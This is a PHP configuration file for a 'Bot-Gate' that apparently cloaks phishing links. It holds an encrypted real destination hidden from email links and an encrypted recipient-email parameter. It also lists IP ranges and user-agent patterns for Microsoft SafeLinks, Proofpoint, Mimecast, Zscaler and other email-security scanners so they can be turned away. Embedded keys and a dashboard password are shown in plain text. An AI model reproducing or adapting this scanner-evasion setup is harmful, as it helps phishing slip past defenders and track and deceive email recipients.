<?php
declare(strict_types=1);

// ═══════════════════════════════════════════════════════════════
// Bot-Gate Configuration (22.05)
// ═══════════════════════════════════════════════════════════════

// AES-256-GCM key (64 hex chars = 32 bytes). Must match the panel's key.
define('SECRET_KEY', 'b2782a331e6ef90f5d70411cd58d4db2b6c68086b3bf1d0a8440abc79eb7540a');

// Query param name for the encrypted email appended to the destination URL.
define('EMAIL_PARAM', 'circuit');

// Password for the /stats dashboard.
define('GATE_PASSWORD', 'CBM3KYfSk0vw90UR');

// Optional ipapi.is key for Layer 5 datacenter/VPN detection.
define('IPAPI_KEY', 'ff3825ecaa1b3615388f');

define('LOG_DIR', __DIR__ . '/jqmpeag');

// Encrypted destination URL — baked into the deployment so it never appears in email links.
// Set by the panel during deploy. hex(iv‖tag‖ciphertext) of the real destination.
define('DEST_ENCRYPTED', 'b6d7bbdda0b5bc9587f9852b3edec6b40936de7295ed1bdf2f4aa58539062b14996468c3b213');

// Secret stats dashboard path (randomized per deploy).
define('STATS_PATH', '/xgkd');

// ── Scanner / ESP IP CIDR ranges (Layer 1) ───────────────────
const SCANNER_CIDRS = [
    // Microsoft SafeLinks / Exchange Online Protection
    '40.94.0.0/16',
    '40.107.0.0/16',
    '52.100.0.0/14',
    '104.47.0.0/16',
    '40.92.0.0/15',
    '40.96.0.0/12',
    '13.107.6.152/31',
    '13.107.18.10/31',
    '13.107.128.0/22',
    '23.103.128.0/17',
    '52.238.78.88/32',

    // Google / Gmail link scanners
    '66.249.64.0/19',
    '66.102.0.0/20',
    '72.14.192.0/18',
    '74.125.0.0/16',
    '209.85.128.0/17',
    '216.239.32.0/19',
    '64.233.160.0/19',

    // Proofpoint
    '67.231.144.0/20',
    '67.231.152.0/21',
    '148.163.128.0/17',

    // Barracuda Networks
    '64.235.144.0/20',
    '209.222.80.0/21',

    // Mimecast
    '207.211.30.0/23',
    '207.211.32.0/22',
    '91.220.42.0/24',
    '170.10.128.0/17',

    // Cisco IronPort / Email Security
    '184.154.0.0/16',
    '208.90.56.0/21',

    // Symantec / Broadcom Email Security
    '216.10.192.0/19',

    // Trend Micro Email Security
    '18.208.22.64/26',
    '150.70.64.0/18',

    // FireEye / Trellix
    '206.72.32.0/20',

    // Cisco Umbrella / OpenDNS crawlers
    '208.67.216.0/21',

    // Fortinet FortiGuard
    '208.91.112.0/21',
    '96.45.32.0/19',

    // Zscaler
    '165.225.0.0/17',
    '104.129.192.0/20',
    '136.226.0.0/16',
];

// ── Bot User-Agent patterns (Layer 2) ────────────────────────
const BOT_UA_PATTERNS = [
    // Headless / automation
    '/HeadlessChrome/i',
    '/HeadlessFirefox/i',
    '/PhantomJS/i',
    '/Selenium/i',
    '/WebDriver/i',
    '/Puppeteer/i',
    '/Playwright/i',

    // CLI / library clients
    '/^curl\b/i',
    '/^Wget\b/i',
    '/python-requests/i',
    '/python-urllib/i',
    '/libwww-perl/i',
    '/^Java\//i',
    '/^Go-http-client/i',
    '/^okhttp/i',
    '/^node-fetch/i',
    '/^axios\//i',
    '/^Apache-HttpClient/i',
    '/^scrapy/i',
    '/^Mozlila/i',

    // SEO / AI crawlers
    '/SemrushBot|AhrefsBot|MJ12bot|DotBot|PetalBot|Bytespider|GPTBot|CCBot|ClaudeBot|anthropic-ai/i',

    // Search engine bots
    '/Googlebot|bingbot|Slurp|DuckDuckBot|YandexBot|Baiduspider/i',

    // Social preview bots
    '/^facebookexternalhit/i',
    '/^Twitterbot/i',
    '/^LinkedInBot/i',
    '/^Discordbot/i',
    '/^Slackbot/i',
    '/^WhatsApp/i',
    '/^TelegramBot/i',

    // ESP link scanners (often use branded UAs)
    '/SafeLinks/i',
    '/Proofpoint/i',
    '/Barracuda/i',
    '/Mimecast/i',
    '/MessageLabs/i',
    '/Symantec/i',
    '/FortiClient/i',
    '/ZScaler/i',
    '/FireEye/i',
    '/IronPort/i',
    '/Cisco\sEmail/i',
    '/TrendMicro/i',

    // Generic scanner signatures
    '/Mozilla\/4\.0\s/i',
    '/^Microsoft Office/i',
    '/^MSIE\s/i',
];
